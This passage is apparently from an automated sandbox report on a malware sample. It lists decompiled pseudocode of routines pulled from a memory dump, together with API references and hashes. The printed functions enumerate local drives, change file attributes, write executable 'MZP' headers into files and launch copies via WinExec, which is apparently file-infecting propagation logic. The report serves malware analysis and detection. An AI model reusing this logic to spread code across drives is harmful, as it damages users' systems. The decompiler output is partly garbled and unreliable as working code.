                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                                                                          • Instruction ID: 984d91ffacc30f0f747519396fe1a4ca6018efb205f81ccdb5163335beaf5ee0
                                                                                                                          • Opcode Fuzzy Hash: b5eb93d17ee822dbc2cfe60c370f870a49ec75f8fbc2fd949dadd44c38c3286c
                                                                                                                          • Instruction Fuzzy Hash: C6417170E046089FDB10EB69CD929AEB7B5EF45304F1044B7F414B73D2DA39AE058E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402FA4() {
                                                                                                                          				struct HINSTANCE__* _t24;
                                                                                                                          				void* _t32;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				void* _t45;
                                                                                                                          
                                                                                                                          				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
                                                                                                                          					L3:
                                                                                                                          					if( *0x409004 != 0) {
                                                                                                                          						E00402E8C();
                                                                                                                          						E00402F18(_t32);
                                                                                                                          						 *0x409004 = 0;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					while(1) {
                                                                                                                          						if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
                                                                                                                          							 *0x0040A62C = 0;
                                                                                                                          						}
                                                                                                                          						E00402D8C();
                                                                                                                          						if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
                                                                                                                          							_t14 =  *0x0040A630;
                                                                                                                          							if( *0x0040A630 != 0) {
                                                                                                                          								E00403C00(_t14);
                                                                                                                          								_t35 =  *((intOrPtr*)(0x40a630));
                                                                                                                          								_t7 = _t35 + 0x10; // 0x0
                                                                                                                          								_t24 =  *_t7;
                                                                                                                          								_t8 = _t35 + 4; // 0x400000
                                                                                                                          								if(_t24 !=  *_t8 && _t24 != 0) {
                                                                                                                          									FreeLibrary(_t24);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						E00402D64();
                                                                                                                          						if( *((char*)(0x40a648)) == 1) {
                                                                                                                          							 *0x0040A644();
                                                                                                                          						}
                                                                                                                          						if( *((char*)(0x40a648)) != 0) {
                                                                                                                          							E00402EE8();
                                                                                                                          						}
                                                                                                                          						if( *0x40a620 == 0) {
                                                                                                                          							if( *0x40a018 != 0) {
                                                                                                                          								 *0x40a018();
                                                                                                                          							}
                                                                                                                          							ExitProcess( *0x409000); // executed
                                                                                                                          						}
                                                                                                                          						memcpy(0x40a620,  *0x40a620, 0xb << 2);
                                                                                                                          						_t45 = _t45 + 0xc;
                                                                                                                          						0x409000 = 0x409000;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						 *0x40a030 = 0;
                                                                                                                          						 *((intOrPtr*)( *0x40a030))();
                                                                                                                          					} while ( *0x40a030 != 0);
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
                                                                                                                          • Instruction ID: 25a4abd2e023ddac5d936c147021e49c52e2d721a9332ed2c08f3b56dfe932ed
                                                                                                                          • Opcode Fuzzy Hash: ab20704e86a3c794a86d4a60a2f3f790aa59cc74fa6ee8820611fb12759a24f3
                                                                                                                          • Instruction Fuzzy Hash: 77218E709012018BEB20AF65C6887537AE9AF44355F24447BD844A72D6D7BCCDC0DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F9C() {
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				struct HINSTANCE__* _t27;
                                                                                                                          				void* _t36;
                                                                                                                          				intOrPtr _t39;
                                                                                                                          				void* _t52;
                                                                                                                          
                                                                                                                          				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                                                                                                          				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
                                                                                                                          					L5:
                                                                                                                          					if( *0x409004 != 0) {
                                                                                                                          						E00402E8C();
                                                                                                                          						E00402F18(_t36);
                                                                                                                          						 *0x409004 = 0;
                                                                                                                          					}
                                                                                                                          					L7:
                                                                                                                          					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
                                                                                                                          						 *0x0040A62C = 0;
                                                                                                                          					}
                                                                                                                          					E00402D8C();
                                                                                                                          					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
                                                                                                                          						_t17 =  *0x0040A630;
                                                                                                                          						if( *0x0040A630 != 0) {
                                                                                                                          							E00403C00(_t17);
                                                                                                                          							_t39 =  *((intOrPtr*)(0x40a630));
                                                                                                                          							_t7 = _t39 + 0x10; // 0x0
                                                                                                                          							_t27 =  *_t7;
                                                                                                                          							_t8 = _t39 + 4; // 0x400000
                                                                                                                          							if(_t27 !=  *_t8 && _t27 != 0) {
                                                                                                                          								FreeLibrary(_t27);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E00402D64();
                                                                                                                          					if( *((char*)(0x40a648)) == 1) {
                                                                                                                          						 *0x0040A644();
                                                                                                                          					}
                                                                                                                          					if( *((char*)(0x40a648)) != 0) {
                                                                                                                          						E00402EE8();
                                                                                                                          					}
                                                                                                                          					if( *0x40a620 == 0) {
                                                                                                                          						if( *0x40a018 != 0) {
                                                                                                                          							 *0x40a018();
                                                                                                                          						}
                                                                                                                          						ExitProcess( *0x409000); // executed
                                                                                                                          					}
                                                                                                                          					memcpy(0x40a620,  *0x40a620, 0xb << 2);
                                                                                                                          					_t52 = _t52 + 0xc;
                                                                                                                          					0x409000 = 0x409000;
                                                                                                                          					goto L7;
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						 *0x40a030 = 0;
                                                                                                                          						 *((intOrPtr*)( *0x40a030))();
                                                                                                                          					} while ( *0x40a030 != 0);
                                                                                                                          					goto L5;
                                                                                                                          				}
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
                                                                                                                          • Instruction ID: 4b2d42af59d3b1d8e88fe9e31da9e43e6ca94f4fbd885f656fef1c50f2c896c1
                                                                                                                          • Opcode Fuzzy Hash: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
                                                                                                                          • Instruction Fuzzy Hash: 1C216D709013418BEB21AF65C6883537BA9AF45315F2444BBD844A72DAD7BCCDC4CBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402FA0() {
                                                                                                                          				struct HINSTANCE__* _t26;
                                                                                                                          				void* _t35;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				void* _t51;
                                                                                                                          
                                                                                                                          				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
                                                                                                                          					L4:
                                                                                                                          					if( *0x409004 != 0) {
                                                                                                                          						E00402E8C();
                                                                                                                          						E00402F18(_t35);
                                                                                                                          						 *0x409004 = 0;
                                                                                                                          					}
                                                                                                                          					L6:
                                                                                                                          					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
                                                                                                                          						 *0x0040A62C = 0;
                                                                                                                          					}
                                                                                                                          					E00402D8C();
                                                                                                                          					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
                                                                                                                          						_t16 =  *0x0040A630;
                                                                                                                          						if( *0x0040A630 != 0) {
                                                                                                                          							E00403C00(_t16);
                                                                                                                          							_t38 =  *((intOrPtr*)(0x40a630));
                                                                                                                          							_t7 = _t38 + 0x10; // 0x0
                                                                                                                          							_t26 =  *_t7;
                                                                                                                          							_t8 = _t38 + 4; // 0x400000
                                                                                                                          							if(_t26 !=  *_t8 && _t26 != 0) {
                                                                                                                          								FreeLibrary(_t26);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E00402D64();
                                                                                                                          					if( *((char*)(0x40a648)) == 1) {
                                                                                                                          						 *0x0040A644();
                                                                                                                          					}
                                                                                                                          					if( *((char*)(0x40a648)) != 0) {
                                                                                                                          						E00402EE8();
                                                                                                                          					}
                                                                                                                          					if( *0x40a620 == 0) {
                                                                                                                          						if( *0x40a018 != 0) {
                                                                                                                          							 *0x40a018();
                                                                                                                          						}
                                                                                                                          						ExitProcess( *0x409000); // executed
                                                                                                                          					}
                                                                                                                          					memcpy(0x40a620,  *0x40a620, 0xb << 2);
                                                                                                                          					_t51 = _t51 + 0xc;
                                                                                                                          					0x409000 = 0x409000;
                                                                                                                          					goto L6;
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						 *0x40a030 = 0;
                                                                                                                          						 *((intOrPtr*)( *0x40a030))();
                                                                                                                          					} while ( *0x40a030 != 0);
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
                                                                                                                          • ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404682716-0
                                                                                                                          • Opcode ID: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
                                                                                                                          • Instruction ID: 1b03414f8cc1a74ea96aefb4ecc0c7aba41324da9db28816bc81a4039e10204c
                                                                                                                          • Opcode Fuzzy Hash: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
                                                                                                                          • Instruction Fuzzy Hash: D8217F709013418BEB20AF65C6883537BA8AF44315F24447BD844A62DAD3BCCDC0CB9E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* _t11;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t32;
                                                                                                                          				intOrPtr _t38;
                                                                                                                          				void* _t44;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t49;
                                                                                                                          
                                                                                                                          				_t56 = __fp0;
                                                                                                                          				_t45 = __esi;
                                                                                                                          				_t48 = _t49;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(__esi);
                                                                                                                          				_push(__edi);
                                                                                                                          				_push(_t49);
                                                                                                                          				_push(0x40765c);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t49; // executed
                                                                                                                          				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					_t40 = 0x14;
                                                                                                                          					E00407080(0x4091c8, 0x14, 0x14);
                                                                                                                          					_t17 = E00404018(0, 0, 0x4091c8); // executed
                                                                                                                          					_t44 = _t17;
                                                                                                                          					if(GetLastError() != 0xb7) {
                                                                                                                          						E00406D40( &_v8, __ebx, _t44, __esi); // executed
                                                                                                                          						_t32 = E0040320C(_v8);
                                                                                                                          						_t53 = _t32;
                                                                                                                          						if(_t32 > 0) {
                                                                                                                          							_t46 = 1;
                                                                                                                          							do {
                                                                                                                          								E004031B4();
                                                                                                                          								_t40 = 0x407674;
                                                                                                                          								E00403214( &_v12, 0x407674);
                                                                                                                          								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
                                                                                                                          								_pop(0x14);
                                                                                                                          								_t46 = _t46 + 1;
                                                                                                                          								_t32 = _t32 - 1;
                                                                                                                          								_t54 = _t32;
                                                                                                                          							} while (_t32 != 0);
                                                                                                                          						}
                                                                                                                          						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56); // executed
                                                                                                                          						ReleaseMutex(_t44);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_pop(_t38);
                                                                                                                          				 *[fs:eax] = _t38;
                                                                                                                          				_push(E00407663);
                                                                                                                          				return E004030B8( &_v12, 2);
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                                                                                            • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 676290295-0
                                                                                                                          • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                                                                                          • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                                                                                          • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
                                                                                                                          				char _v155;
                                                                                                                          				char _v160;
                                                                                                                          				int _t23;
                                                                                                                          				signed int _t37;
                                                                                                                          				intOrPtr _t41;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t51;
                                                                                                                          
                                                                                                                          				_t50 = _t51;
                                                                                                                          				_v160 = 0;
                                                                                                                          				_t45 = __eax;
                                                                                                                          				_push(_t50);
                                                                                                                          				_push(0x406dfc);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t51 + 0xffffff64;
                                                                                                                          				GetLogicalDriveStringsA(0x97,  &_v155); // executed
                                                                                                                          				_t37 = 0;
                                                                                                                          				while(_a12245929 != 0) {
                                                                                                                          					_t48 = _t37 & 0x000000ff;
                                                                                                                          					_t23 = GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97); // executed
                                                                                                                          					if(_t23 != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
                                                                                                                          						E004031B4();
                                                                                                                          						E00403214(_t45, _v160);
                                                                                                                          					}
                                                                                                                          					_t37 = _t37 + 4;
                                                                                                                          				}
                                                                                                                          				_pop(_t41);
                                                                                                                          				 *[fs:eax] = _t41;
                                                                                                                          				_push(E00406E03);
                                                                                                                          				return E00403094( &_v160);
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Drive$LogicalStringsType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1630765265-0
                                                                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004012A0(void* __eax, void** __edx) {
                                                                                                                          				void* _t3;
                                                                                                                          				void** _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				long _t14;
                                                                                                                          
                                                                                                                          				_t8 = __edx;
                                                                                                                          				if(__eax >= 0x100000) {
                                                                                                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                          				} else {
                                                                                                                          					_t14 = 0x100000;
                                                                                                                          				}
                                                                                                                          				_t8[1] = _t14;
                                                                                                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                          				_t11 = _t3;
                                                                                                                          				 *_t8 = _t11;
                                                                                                                          				if(_t11 != 0) {
                                                                                                                          					_t3 = E00401154(0x40a5d4, _t8);
                                                                                                                          					if(_t3 == 0) {
                                                                                                                          						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                          						 *_t8 = 0;
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2087232378-0
                                                                                                                          • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                                                                                          • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                                                                                          • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 52%
                                                                                                                          			E00407D9C(char* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                          				char* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				int _v28;
                                                                                                                          				void* _t49;
                                                                                                                          				intOrPtr _t56;
                                                                                                                          				void* _t63;
                                                                                                                          				intOrPtr _t66;
                                                                                                                          
                                                                                                                          				_t62 = __esi;
                                                                                                                          				_t61 = __edi;
                                                                                                                          				_t48 = __ebx;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(__esi);
                                                                                                                          				_v8 = __eax;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				_push(_t66);
                                                                                                                          				_push(0x407e75);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t66;
                                                                                                                          				if( *_v8 != 0x5c) {
                                                                                                                          					E00407BD4(_v8, __ebx, __esi); // executed
                                                                                                                          				} else {
                                                                                                                          					E004071D0(_v8, __ebx, __edi, __esi);
                                                                                                                          				}
                                                                                                                          				_t63 = E00404AE8(_t48, _t61, _t62);
                                                                                                                          				if(_t63 > 0) {
                                                                                                                          					_t49 = 1;
                                                                                                                          					do {
                                                                                                                          						E004049D0(_t49, _t49,  &_v12, _t61, _t63);
                                                                                                                          						if( *_v12 != 0x5c) {
                                                                                                                          							E004049D0(_t49, _t49,  &_v20, _t61, _t63);
                                                                                                                          							E00407BD4(_v20, _t49, _t63); // executed
                                                                                                                          						} else {
                                                                                                                          							E004049D0(_t49, _t49,  &_v16, _t61, _t63);
                                                                                                                          							E004071D0(_v16, _t49, _t61, _t63);
                                                                                                                          						}
                                                                                                                          						_t49 = _t49 + 1;
                                                                                                                          						_t63 = _t63 - 1;
                                                                                                                          					} while (_t63 != 0);
                                                                                                                          				}
                                                                                                                          				_push(1);
                                                                                                                          				_push(_v8);
                                                                                                                          				_push(E00407E8C);
                                                                                                                          				E00406F34(0, _t48,  &_v28, _t61, _t63);
                                                                                                                          				E004032CC();
                                                                                                                          				WinExec(E0040340C(_v24), _v28); // executed
                                                                                                                          				_pop(_t56);
                                                                                                                          				 *[fs:eax] = _t56;
                                                                                                                          				_push(E00407E7C);
                                                                                                                          				return E004030B8( &_v28, 6);
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • WinExec.KERNEL32 ref: 00407E55
                                                                                                                            • Part of subcall function 004071D0: GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                            • Part of subcall function 004071D0: SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                            • Part of subcall function 00407BD4: GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                                                                            • Part of subcall function 00407BD4: SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$ExecModuleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1864538708-0
                                                                                                                          • Opcode ID: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                                                                          • Instruction ID: 40707d73a39ba7ecc7968a88c6b1cf4d961407a3323fd5b51122ef1c80257f0a
                                                                                                                          • Opcode Fuzzy Hash: 2dd2dee9ac6b51d1a558883945a056b3e2b38872fad6aa3749e99bffffc21bfb
                                                                                                                          • Instruction Fuzzy Hash: C5216570E04209AFDB01EBA5CC82AAF77B8EF44304F5044BBB500B72D1D67CAE05979A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E00405E50(void* __eax, void* __ecx, void* __edx) {
                                                                                                                          				void* _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				void* _t13;
                                                                                                                          				long _t14;
                                                                                                                          				void* _t21;
                                                                                                                          				void* _t23;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t33;
                                                                                                                          
                                                                                                                          				_push(__eax);
                                                                                                                          				_t8 = E00404B68(__edx, 0x40000400) + 1;
                                                                                                                          				if(_t8 != 0) {
                                                                                                                          					_t23 = _t8 - 1;
                                                                                                                          					_pop(_t11);
                                                                                                                          					E00405D30(_t11, _t33);
                                                                                                                          					_t13 = 0;
                                                                                                                          					_t14 = E0040320C(_t13);
                                                                                                                          					_t32 = _t13;
                                                                                                                          					_push(_t32);
                                                                                                                          					E00404BE0(_t23, _t14, _t32);
                                                                                                                          					SetEndOfFile(_t23); // executed
                                                                                                                          					E00404B90(_t23);
                                                                                                                          					_t21 = E004044A8();
                                                                                                                          					_push(_t32);
                                                                                                                          					_t8 = _t21 + 1;
                                                                                                                          				}
                                                                                                                          				return _t8;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          • SetEndOfFile.KERNEL32(?,00000000,?,00407FE8,00000000,00407FFE,?,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000), ref: 00405E7E
                                                                                                                            • Part of subcall function 00404B90: CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065093856-0
                                                                                                                          Uniqueness
